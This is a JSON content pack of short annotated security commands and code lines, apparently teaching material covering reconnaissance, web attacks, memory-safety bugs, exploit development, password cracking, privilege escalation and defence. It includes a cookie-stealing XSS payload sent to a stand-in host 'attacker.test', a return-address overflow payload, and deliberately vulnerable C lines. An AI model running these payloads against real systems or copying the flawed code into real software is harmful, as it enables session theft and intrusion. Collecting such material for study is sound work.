srdusr
aboutsummaryrefslogtreecommitdiffstats
path: root/data/packs/hacking.json
blob: da02dc7d0d277aff00edcd254464da1ccf619600 (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
[
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Recon",
    "explanation": "A TCP SYN scan of the top 1000 ports. -sV asks each open port for its service banner, which is what turns a port list into a target list.",
    "content": "nmap -sS -sV -T4 --top-ports 1000 10.0.0.0/24"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Recon",
    "explanation": "Resolves a wordlist of names against a domain. Subdomains are where forgotten staging boxes live.",
    "content": "gobuster dns -d example.com -w /usr/share/wordlists/subdomains.txt -t 40"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Recon",
    "explanation": "Pulls every unique path a site references from its own JavaScript. Endpoints that no link points at are still endpoints.",
    "content": "curl -s https://target/app.js | grep -oE '\"/[a-zA-Z0-9_/-]+\"' | sort -u"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Web",
    "attribution_note": "",
    "explanation": "Directory brute force. -x tries extensions, so index.php.bak and config.old surface alongside directories.",
    "content": "ffuf -u https://target/FUZZ -w wordlist.txt -e .php,.bak,.old -mc 200,301,403"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Web",
    "explanation": "Requests a path with an absolute URL to see whether the proxy in front trusts it. A different response here often means an internal service is reachable.",
    "content": "curl -s -o /dev/null -w '%{http_code}' 'https://target/@internal/admin'"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Web",
    "explanation": "A header the application echoes back into a redirect or a password-reset link is a host header injection.",
    "content": "curl -H 'X-Forwarded-Host: attacker.test' -s https://target/reset | grep -i location"
  },
  {
    "category": "hacking",
    "language": "clike",
    "attribution": "Memory safety",
    "explanation": "The classic overflow: strcpy writes until it finds a NUL, buf holds 64 bytes, and nothing checks which is larger.",
    "content": "char buf[64]; strcpy(buf, argv[1]); /* no bound - argv[1] decides the write length */"
  },
  {
    "category": "hacking",
    "language": "clike",
    "attribution": "Memory safety",
    "explanation": "Freed then used. The allocator may hand that block to something else between the two lines, so the write lands in another object.",
    "content": "free(ptr); ptr->next = head; /* use after free: the block may belong to someone else now */"
  },
  {
    "category": "hacking",
    "language": "clike",
    "attribution": "Memory safety",
    "explanation": "An attacker-controlled format string. Every %x walks the stack; %n writes to it.",
    "content": "printf(user_input); /* format string bug - should be printf(\"%s\", user_input) */"
  },
  {
    "category": "hacking",
    "language": "python",
    "attribution": "Exploit dev",
    "explanation": "A cyclic pattern. Whatever four bytes end up in the instruction pointer tell you the exact offset to the return address.",
    "content": "payload = b'A' * 72 + p64(0x401196) + p64(win_addr)"
  },
  {
    "category": "hacking",
    "language": "python",
    "attribution": "Exploit dev",
    "explanation": "Leaks a libc address from the GOT, then rebases every other libc symbol off it. This is how ASLR is worked around rather than defeated.",
    "content": "libc.address = leak - libc.symbols['puts']"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Crypto",
    "explanation": "An MD5 of a known-weak hash type. Modern password hashing exists because this takes seconds, not years.",
    "content": "hashcat -m 0 -a 0 hashes.txt rockyou.txt --force"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Crypto",
    "explanation": "Reads the certificate a host presents. Expiry dates and hostname mismatches are found here, not in a browser warning.",
    "content": "openssl s_client -connect target:443 -servername target < /dev/null | openssl x509 -noout -text"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Post-exploitation",
    "explanation": "Finds setuid binaries. Anything unusual here runs as its owner no matter who executes it.",
    "content": "find / -perm -4000 -type f 2>/dev/null"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Post-exploitation",
    "explanation": "Lists what the current user may run as root. A single entry with NOPASSWD is often the whole path to root.",
    "content": "sudo -l 2>/dev/null | grep -E 'NOPASSWD|\\(ALL\\)'"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Post-exploitation",
    "explanation": "Upgrades a dumb shell to a real TTY, so job control, tab completion and su all start working.",
    "content": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
  },
  {
    "category": "hacking",
    "language": "javascript",
    "attribution": "Web",
    "explanation": "A stored XSS payload that steals a session. HttpOnly on the cookie is what stops this line reading it.",
    "content": "fetch('//attacker.test/?c=' + encodeURIComponent(document.cookie))"
  },
  {
    "category": "hacking",
    "language": "javascript",
    "attribution": "Web",
    "explanation": "Prototype pollution: writing through __proto__ reaches every object that inherits from it.",
    "content": "JSON.parse('{\"__proto__\": {\"isAdmin\": true}}')"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Defence",
    "explanation": "Blocks everything inbound by default and allows what is needed back. A deny-by-default policy is the only kind worth writing.",
    "content": "iptables -P INPUT DROP && iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Defence",
    "explanation": "Watches authentication failures as they happen. Most intrusions are visible in logs long before they are noticed.",
    "content": "journalctl -u sshd -f | grep -Ei 'failed|invalid user'"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Defence",
    "explanation": "Compares installed files against the package manager's own checksums. A changed system binary shows up here.",
    "content": "pacman -Qkk 2>&1 | grep -v ' 0 altered files'"
  },
  {
    "category": "hacking",
    "language": "python",
    "attribution": "Defence",
    "explanation": "Constant-time comparison. A plain == returns early on the first differing byte, which leaks the answer through timing.",
    "content": "if not hmac.compare_digest(expected_sig, provided_sig): raise ValueError('bad signature')"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Recon",
    "explanation": "Certificate transparency logs list every name a CA has issued for a domain, including hosts that were never meant to be public.",
    "content": "curl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq -r '.[].name_value' | sort -u"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Web",
    "explanation": "Checks whether a session cookie carries the flags that stop JavaScript reading it and stop it crossing sites.",
    "content": "curl -sI https://target/login | grep -i 'set-cookie' | grep -ci 'httponly.*secure'"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Web",
    "explanation": "Requests the same path twice with different cache-busting keys to see whether a proxy will serve one user's response to another.",
    "content": "curl -s 'https://target/?x=1' -H 'X-Forwarded-Scheme: nothttps' -o /dev/null -w '%{http_code} %{time_total}\\n'"
  },
  {
    "category": "hacking",
    "language": "python",
    "attribution": "Crypto",
    "explanation": "A length-extension attack works because the hash's internal state is its output. HMAC exists precisely to stop this.",
    "content": "forged = hashlib.sha256(secret_len * b'\\x00' + original + padding + suffix).hexdigest()"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Post-exploitation",
    "explanation": "Capabilities are finer-grained than setuid but grant real power. cap_setuid on an interpreter is root.",
    "content": "getcap -r / 2>/dev/null | grep -E 'cap_(setuid|dac_override|sys_admin)'"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Defence",
    "explanation": "Audits which accounts can escalate, and how. The answer is usually longer than anyone expects.",
    "content": "grep -rE '^[^#].*(ALL|NOPASSWD)' /etc/sudoers /etc/sudoers.d/ 2>/dev/null"
  },
  {
    "category": "hacking",
    "language": "shell",
    "attribution": "Defence",
    "explanation": "Compares running kernel modules against what the package manager installed. An unexpected module is worth explaining.",
    "content": "lsmod | awk 'NR>1 {print $1}' | while read m; do modinfo -n \"$m\" 2>/dev/null; done | grep -v '^/lib/modules'"
  },
  {
    "category": "hacking",
    "language": "python",
    "attribution": "Defence",
    "explanation": "Parameterised queries send the values separately from the statement, so nothing the user types can become SQL.",
    "content": "cur.execute('SELECT * FROM users WHERE name = %s AND active = %s', (name, True))"
  },
  {
    "category": "hacking",
    "content": "nmap -sV -sC -p- --min-rate 1000 -oA scan 10.0.0.0/24",
    "attribution": "nmap",
    "explanation": "-p- covers all 65535 ports rather than the usual thousand. -oA writes all three output formats at once, which matters because a scan is slow to repeat.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "gobuster dir -u https://target -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 40",
    "attribution": "gobuster",
    "explanation": "-x appends extensions to every word, so one wordlist tests several file types. Authorised testing only: this is noisy and appears plainly in any access log.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r rules/best64.rule",
    "attribution": "hashcat",
    "explanation": "-m selects the hash type and -a 0 is a straight dictionary attack. A rule file mutates each candidate, which covers far more of the search space than the raw list.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "openssl s_client -connect example.com:443 -servername example.com </dev/null 2>/dev/null | openssl x509 -noout -text",
    "attribution": "openssl",
    "explanation": "-servername sends the SNI field, without which a shared host returns the wrong certificate. Redirecting standard input stops the client waiting for something to send.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "tcpdump -i eth0 -nn -s0 -w capture.pcap 'tcp port 80 and host 10.0.0.5'",
    "attribution": "tcpdump",
    "explanation": "-s0 captures whole packets rather than the first bytes. The quoted expression is a BPF filter, applied in the kernel, so unmatched traffic is never copied.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "ffuf -w params.txt -u 'https://target/api?FUZZ=1' -fs 1234 -mc all",
    "attribution": "ffuf",
    "explanation": "-fs hides responses of one exact size, which is how a uniform wall of not-found pages is removed. -mc all then keeps every remaining status code for inspection.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "john --wordlist=rockyou.txt --rules=Jumbo --format=sha512crypt shadow.txt",
    "attribution": "john",
    "explanation": "Rules generate variations of each word: capitalisation, appended digits, common substitutions. Naming the format skips John's guess, which is often wrong on mixed files.",
    "language": "shell"
  },
  {
    "category": "hacking",
    "content": "sqlmap -u 'https://target/item?id=1' --batch --level 3 --risk 2 --dbs",
    "attribution": "sqlmap",
    "explanation": "--batch answers prompts with the default so it runs unattended. Level and risk widen the payloads tried, at the cost of a much noisier and slower test.",
    "language": "shell"
  }
]